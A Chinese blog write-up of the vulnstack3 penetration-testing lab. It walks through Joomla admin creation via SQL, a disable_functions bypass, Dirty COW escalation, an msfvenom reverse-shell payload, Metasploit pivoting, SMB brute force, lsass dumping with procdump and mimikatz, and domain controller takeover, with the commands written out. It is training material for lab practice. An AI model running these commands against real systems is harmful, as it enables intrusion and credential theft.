内网渗透之vulnstack3

前言

靶场:红日安全vulnstack3

目标站点:192.168.199.163

正文

访问目标站点,发现这是joomla系统搭建的站点,使用扫描器扫描其版本信息。版本为3.9.12,没有发现可利用的漏洞。

image-20201127040406924

扫描其开放端口

image-20201127040406924

扫描其目录

image-20201127040731547

看几个重要配置文件,比如robots.txtweb.config.txtconfiguration.php/.php~

存在敏感信息泄露,在configuration.php~中发现了数据库的账号密码。

image-20201127040805512

连接数据库

image-20201127041049867

做一些基本的操作,数据库常见的into outfile-getshellgeneral_log-getshell,但是没有成功

image-20201127041749289

image-20201127042757574

joomla可以通过数据库创建新的超级管理员

image-20201127044631793

Joomla-创建超级管理员

1
2
3
4
5
6
INSERT INTO `am2zu_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

登陆后台

image-20201127050029025

写shell

image-20201201185110510

但是这里有disable_function的限制

image-20201201185524823

利用LD_PRELOAD绕过disable_function

1
http://192.168.3.48/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/xx&sopath=/var/www/html/bypass_disablefunc_x64.so

查看基本信息,这里有一个内网的IP地址:192.168.93.120

image-20201130132504048

ubuntu的版本较新,没法提权

image-20201130133910570

因为是靶机,所以home,tmp文件夹下一般都会有提示信息,发现一个账号密码,之前有看到开启22号端口

image-20201130134519187

ssh登陆,查看IP,发现这里的IP信息和刚才查看的信息不一致

image-20201130134849796

这里使用了nginx服务器,大概是利用了nignx反向代理的技术

image-20201201190712010

centos的版本可以使用脏牛提权,这里利用脏牛提权,将dirty.c上传到目标服务器,进行提权处理

1
2
gcc -pthread dirty.c -o dirty -lcrypt
./dirty hello_nac

image-20201130143008126

image-20201130143414639

metasploit获得反弹shell

1
./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.199.188 LPORT=4444 -f elf > payload.elf

image-20201130150413591

image-20201130150954790

创建一条静态路由

1
2
3
run get_local_subnets #查看本地的子网网段
run autoroute -s 192.168.93.1/24 #生成静态路由
run autoroute -p #查看静态路由表

image-20201130204319182

利用msf-sock4a+proxychains进行内网探测

1
use auxiliary/server/socks4a

image-20201130165307424

image-20201201191115931

使用代理,对内网进行探测

1
2
proxychains msfconsole
use auxiliary/scanner/smb/smb_version

image-20201130210921597

这里得到两个主机

1
2
Windows 2012 R2 192.168.93.10
windows 2008 R2 192.168.93.20

使用nmap分别对这两个IP进行端口探测

1
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445,1433,3306,3389 192.168.93.20/10

image-20201130223014474

image-20201130223122011

在永恒之蓝打不动的时候,就尝试使用密码爆破

1
use auxiliary/scanner/smb/smb_login

image-20201130224544768

image-20201130224606317

1
Windows 2008 R2 administrator/123qwe!ASD

利用smbclient登陆

1
proxychains smbclient //192.168.93.20/C$ -U administrator

image-20201201000045888

上传procdump,mimikatz

1
2
put procdump.exe
put mimikatz.exe

利用impacket工具包中的wmiexec登陆内网机器,进行操作

1
2
3
4
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
cd examples
proxychains python wmiexec.py administrator:'123qwe!ASD'

image-20201201114020687

利用procdump导出lsass.dmp

1
procdump.exe -accepteula -ma lsass.exe lsass.dmp

利用mimikatz抓取密码

image-20201201120830617

PS:漏掉了域控定位的操作

1
ping test.org

能看到域控在192.168.93.10,获得域控的账号密码:administrator/zxcASDqw123!!

登陆域控成功

image-20201201121009211

Author: 我是小吴啦
Link: http://yoursite.com/2020/11/01/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8Bvulnstack3/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.